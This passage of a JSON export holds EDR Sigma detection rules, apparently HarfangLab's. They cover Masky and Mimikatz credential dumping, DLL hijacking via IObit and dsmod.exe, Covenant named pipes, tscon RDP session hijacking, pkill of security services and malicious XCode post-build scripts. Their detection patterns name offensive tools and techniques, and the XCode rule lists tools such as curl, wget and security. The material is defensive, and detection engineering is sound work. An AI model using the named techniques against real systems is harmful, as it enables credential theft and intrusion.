"rule_description": "Detects the exploitation of the Windows RpcEptMapper Service Insecure Registry Permissions vulnerability.\nThis is an Elevation of Privilege (EoP) flaw that arises from improper permissions set on certain Windows registry keys associated with the RpcEptMapper (RPC Endpoint Mapper) service.\nThis rule detects when a value is written under the Performance subkey in Dnscache or RpcEptMapper (insecure registry keys in win7 / 2008 R2).\nIt is recommended to investigate the registry modification to determine its legitimacy and the process making the registry modification for other suspicious behavior.\n",
"rule_creation_date": "2020-11-27",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "efc91ffa-0729-42e4-9e4d-f33d607c09e4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074343Z",
"creation_date": "2026-03-23T11:45:34.074345Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074350Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://z4ksec.github.io/posts/masky-release-v0.0.3/",
"https://github.com/Z4kSec/Masky",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_masky_malicious_tool_execution.yml",
"content": "title: Masky Execution\nid: efc91ffa-0729-42e4-9e4d-f33d607c09e4\ndescription: |\n Detects an execution of Masky.\n Masky is an offensive open-source tool used to remotely dump domain users' credentials exploiting an ADCS (Active Directory Certificate Services) server.\n It is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\nreferences:\n - https://z4ksec.github.io/posts/masky-release-v0.0.3/\n - https://github.com/Z4kSec/Masky\n - https://attack.mitre.org/techniques/T1003/\ndate: 2022/09/12\nmodified: 2025/04/17\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Masky\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\Masky.exe'\n - OriginalFileName: 'Masky.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "efc91ffa-0729-42e4-9e4d-f33d607c09e4",
"rule_name": "Masky Execution",
"rule_description": "Detects an execution of Masky.\nMasky is an offensive open-source tool used to remotely dump domain users' credentials exploiting an ADCS (Active Directory Certificate Services) server.\nIt is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\n",
"rule_creation_date": "2022-09-12",
"rule_modified_date": "2025-04-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "efd4b774-b093-4772-891d-c34efe568c6e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098892Z",
"creation_date": "2026-03-23T11:45:34.098894Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098898Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lab52.io/blog/dll-side-loading-through-iobit-against-colombia/",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iobit.yml",
"content": "title: DLL Hijacking via IObit\nid: efd4b774-b093-4772-891d-c34efe568c6e\ndescription: |\n Detects a potential Windows DLL hijacking via the IObit software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to check the loaded DLL for malicious content as well as to investigate the behavior of the IOBit process.\nreferences:\n - https://lab52.io/blog/dll-side-loading-through-iobit-against-colombia/\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/12/12\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName:\n - 'RttHlp.exe'\n - 'IUService.exe'\n ProcessSignature: 'IObit CO., LTD'\n ImageLoaded|endswith:\n - '\\Register.dll'\n - '\\rtl120.bpl'\n - '\\vcl120.bpl'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\IObit\\Driver Booster\\'\n - '?:\\Program Files (x86)\\IObit\\IObit Uninstaller\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\IObit\\Driver Booster\\'\n - '?:\\Program Files (x86)\\IObit\\IObit Uninstaller\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature|contains: 'IObit CO., LTD'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "efd4b774-b093-4772-891d-c34efe568c6e",
"rule_name": "DLL Hijacking via IObit",
"rule_description": "Detects a potential Windows DLL hijacking via the IObit software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to check the loaded DLL for malicious content as well as to investigate the behavior of the IOBit process.\n",
"rule_creation_date": "2024-12-12",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0169aef-cb6b-4325-8927-9e651b5892c9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084903Z",
"creation_date": "2026-03-23T11:45:34.084905Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084910Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/mimidrv-in-depth-4d273d19e148",
"https://attack.mitre.org/techniques/T1569/002",
"https://attack.mitre.org/software/S0002"
],
"name": "t1569_002_mimikatz_driver_loaded.yml",
"content": "title: Mimikatz Driver Registry Values Set\nid: f0169aef-cb6b-4325-8927-9e651b5892c9\ndescription: |\n Detects when Mimikatz driver service \"mimidrv\" values are set in the registry.\n This may be indicative of the Mimikatz driver being loaded.\n Mimikatz is a popular offensive security tool used for credential acquisition and lateral movement on an Active Directory endpoint.\n It is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\nreferences:\n - https://posts.specterops.io/mimidrv-in-depth-4d273d19e148\n - https://attack.mitre.org/techniques/T1569/002\n - https://attack.mitre.org/software/S0002\ndate: 2021/05/06\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - attack.s0002\n - classification.Windows.Source.Registry\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_service_start:\n EventType: 'SetValue'\n TargetObject|startswith: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\mimidrv\\Start'\n Details: 'DWORD (0x00000002)' # SERVICE_AUTO_START\n\n selection_service_image:\n EventType: 'SetValue'\n TargetObject|startswith: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\mimidrv\\ImagePath'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0169aef-cb6b-4325-8927-9e651b5892c9",
"rule_name": "Mimikatz Driver Registry Values Set",
"rule_description": "Detects when Mimikatz driver service \"mimidrv\" values are set in the registry.\nThis may be indicative of the Mimikatz driver being loaded.\nMimikatz is a popular offensive security tool used for credential acquisition and lateral movement on an Active Directory endpoint.\nIt is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\n",
"rule_creation_date": "2021-05-06",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f01e4279-308b-48e6-ba7f-f31399d641ac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097052Z",
"creation_date": "2026-03-23T11:45:34.097054Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097058Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsmod.yml",
"content": "title: DLL Hijacking via dsmod.exe\nid: f01e4279-308b-48e6-ba7f-f31399d641ac\ndescription: |\n Detects potential Windows DLL Hijacking via dsmod.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsmod.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\activeds.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f01e4279-308b-48e6-ba7f-f31399d641ac",
"rule_name": "DLL Hijacking via dsmod.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsmod.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f041c41b-593e-43a7-8b24-6ea4c1365e46",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072755Z",
"creation_date": "2026-03-23T11:45:34.072757Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072761Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://riccardoancarani.github.io/2019-10-19-hunting-covenant-msbuild/",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_default_covenant_named_pipes_creation.yml",
"content": "title: Default Covenant Named Pipe Created\nid: f041c41b-593e-43a7-8b24-6ea4c1365e46\ndescription: |\n Detects the creation of a named pipe pertaining to Covenant.\n Covenant uses Named Pipes mainly to self-replicate using SMB.\n It is recommended to analyze the process responsible for the named pipe creation to determine its legitimacy and to look for subsequent malicious actions executed on the host.\nreferences:\n - https://riccardoancarani.github.io/2019-10-19-hunting-covenant-msbuild/\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.Covenant\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n # Endswith here allows us to match pipes that are prefixed\n # with hosts\n PipeName|endswith: '\\gruntsvc'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f041c41b-593e-43a7-8b24-6ea4c1365e46",
"rule_name": "Default Covenant Named Pipe Created",
"rule_description": "Detects the creation of a named pipe pertaining to Covenant.\nCovenant uses Named Pipes mainly to self-replicate using SMB.\nIt is recommended to analyze the process responsible for the named pipe creation to determine its legitimacy and to look for subsequent malicious actions executed on the host.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0a84a5f-a25c-4af2-b09a-10fced00686a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626044Z",
"creation_date": "2026-03-23T11:45:34.626046Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626050Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement",
"https://blog.gentilkiwi.com/securite/vol-de-session-rdp",
"https://attack.mitre.org/techniques/T1563/002/"
],
"name": "t1563_002_tscon_session_hijacking.yml",
"content": "title: Possible Session Hijacking via Tscon\nid: f0a84a5f-a25c-4af2-b09a-10fced00686a\ndescription: |\n This rule detects the usage of the tscon.exe utility from the \"NT AUTHORITY\\SYSTEM\" user. Terminal Services Console (tscon) is used to connect to another session on a Remote Desktop Session Host server.\n With System permissions, an attacker can hijack a session without the need for credentials or prompts to the user. This can be done locally or remotely.\n To investigate this alert, look for the usage of qwinsta or quser as a way to discover remote RDP sessions. HarfangLab EDR provides alerts when these binaries are used for discovery.\n It also recommended to attempt to correlate RDP logins across machines to determine if the tool was used successfully.\n Steps to reproduce this along with an investigation guide are present in the references.\nreferences:\n - https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement\n - https://blog.gentilkiwi.com/securite/vol-de-session-rdp\n - https://attack.mitre.org/techniques/T1563/002/\ndate: 2023/08/25\nmodified: 2026/01/05\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1563.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Tscon\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'tscon.exe'\n UserSID|startswith: 'S-1-5-18'\n\n exclusion_appdis:\n ParentImage|endswith:\n - '\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\AppliDis Starter.exe'\n - '\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\ThinDesktop\\adisbureau.exe'\n\n exclusion_opentext:\n ParentImage: '?:\\Program Files (x86)\\OpenText\\Functional Testing\\bin\\HP.UFT.HelperService.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0a84a5f-a25c-4af2-b09a-10fced00686a",
"rule_name": "Possible Session Hijacking via Tscon",
"rule_description": "This rule detects the usage of the tscon.exe utility from the \"NT AUTHORITY\\SYSTEM\" user. Terminal Services Console (tscon) is used to connect to another session on a Remote Desktop Session Host server.\nWith System permissions, an attacker can hijack a session without the need for credentials or prompts to the user. This can be done locally or remotely.\nTo investigate this alert, look for the usage of qwinsta or quser as a way to discover remote RDP sessions. HarfangLab EDR provides alerts when these binaries are used for discovery.\nIt also recommended to attempt to correlate RDP logins across machines to determine if the tool was used successfully.\nSteps to reproduce this along with an investigation guide are present in the references.\n",
"rule_creation_date": "2023-08-25",
"rule_modified_date": "2026-01-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1563.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0acccd3-038d-40db-a283-4ac1f2180038",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089712Z",
"creation_date": "2026-03-23T11:45:34.089714Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089719Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1489/",
"https://attack.mitre.org/techniques/T1569/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1489_service_killed.yml",
"content": "title: System Service Killed via Pkill\nid: f0acccd3-038d-40db-a283-4ac1f2180038\ndescription: |\n Detects when an important service is manually killed using pkill.\n Adversaries may kill services on a system to render these services unavailable to legitimate users or to impair the security tools already installed.\n It is recommended to ensure that both a legitimate administrator disabled this service and that the service is not critical.\nreferences:\n - https://attack.mitre.org/techniques/T1489/\n - https://attack.mitre.org/techniques/T1569/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/12/15\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1489\n - attack.execution\n - attack.t1569\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.ServiceStop\n - classification.Linux.Behavior.ImpairDefenses\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_pkill:\n Image|endswith: '/pgrep'\n CommandLine|contains: 'pkill '\n\n selection_service:\n CommandLine|contains:\n - ' cron' # and crond\n - ' cupsd'\n - ' sshd'\n - ' syslog'\n - ' rsyslog'\n - ' systemd-journald'\n\n exclusion_logrotate:\n ProcessCommandLine: 'pkill -HUP rsyslog'\n GrandparentImage: '/usr/sbin/logrotate'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0acccd3-038d-40db-a283-4ac1f2180038",
"rule_name": "System Service Killed via Pkill",
"rule_description": "Detects when an important service is manually killed using pkill.\nAdversaries may kill services on a system to render these services unavailable to legitimate users or to impair the security tools already installed.\nIt is recommended to ensure that both a legitimate administrator disabled this service and that the service is not critical.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-02-18",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1489",
"attack.t1562.001",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0d1c4cb-e4b7-4318-b662-6747eab2e190",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093788Z",
"creation_date": "2026-03-23T11:45:34.093790Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093795Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1195/"
],
"name": "t1195_xcode_postbuild_script.yml",
"content": "title: Suspicious Programm Launched via XCode Postbuild Script\nid: f0d1c4cb-e4b7-4318-b662-6747eab2e190\ndescription: |\n Detects a suspicious program being launch by XCode.\n This can be the result of a malicious post build script being executed after the compilation of an infected XCode project.\n If an XCode project has post build scripts configured, they are run automatically by XCode after the compilation.\n Adversaries can publish XCode projects with malicious post build scripts that executes malicious code to infect users when they compile the project.\n It is recommended to investigate the children of XCode, the post build script and the origin of the project to determine whether this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1195/\ndate: 2024/06/11\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1195\n - attack.defense_evasion\n - attack.t1222.002\n - attack.collection\n - attack.t1560.001\n - attack.command_and_control\n - attack.t1105\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.InitialAccess\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection_ancestors:\n Ancestors|contains: '/Contents/MacOS/XCBBuildService'\n\n selection_descendants_lolbins:\n Image|endswith:\n - '/killall'\n - '/sleep'\n - '/launchctl'\n - '/curl'\n - '/wget'\n - '/zip'\n - '/osascript'\n - '/cat'\n - '/dscl'\n - '/mdls'\n - '/security'\n - '/sw_vers'\n - '/dscacheutil'\n - '/csrutil'\n - '/netstat'\n - '/who'\n - '/preintenv'\n - '/smbutil'\n - '/shownmount'\n - '/dseditgroup'\n - '/kcc'\n - '/mkpassdb'\n - '/dsenableroot'\n - '/ldapsearch'\n - '/nohup'\n\n selection_descendants_chmod:\n CommandLine|contains: 'chmod +x'\n\n exclusion_toolchain:\n CommandLine: '/bin/cat /Applications/Xcode*Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/share/docc/features.json'\n\n exclusion_unity:\n CommandLine|startswith: 'chmod +x /Users/*/Unity/'\n\n exclusion_unity2:\n CommandLine|startswith: 'chmod +x */Il2CppOutputProject/IL2CPP/build/deploy_arm64/'\n ParentCommandLine|startswith: '/bin/sh /Users/*/Library/Developer/Xcode/DerivedData/Unity-iPhone-*/Build/Intermediates.noindex/Unity-iPhone.build/ReleaseForRunning-iphoneos/GameAssembly.build/Script-*.sh/bin/sh'\n\n exclusion_flutter:\n CommandLine: 'cat */flutter/bin/cache/flutter_tools.stamp'\n\n condition: selection_ancestors and 1 of selection_descendants_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0d1c4cb-e4b7-4318-b662-6747eab2e190",
"rule_name": "Suspicious Programm Launched via XCode Postbuild Script",
"rule_description": "Detects a suspicious program being launch by XCode.\nThis can be the result of a malicious post build script being executed after the compilation of an infected XCode project.\nIf an XCode project has post build scripts configured, they are run automatically by XCode after the compilation.\nAdversaries can publish XCode projects with malicious post build scripts that executes malicious code to infect users when they compile the project.\nIt is recommended to investigate the children of XCode, the post build script and the origin of the project to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-06-11",
"rule_modified_date": "2025-02-10",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1195",
"attack.t1222.002",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
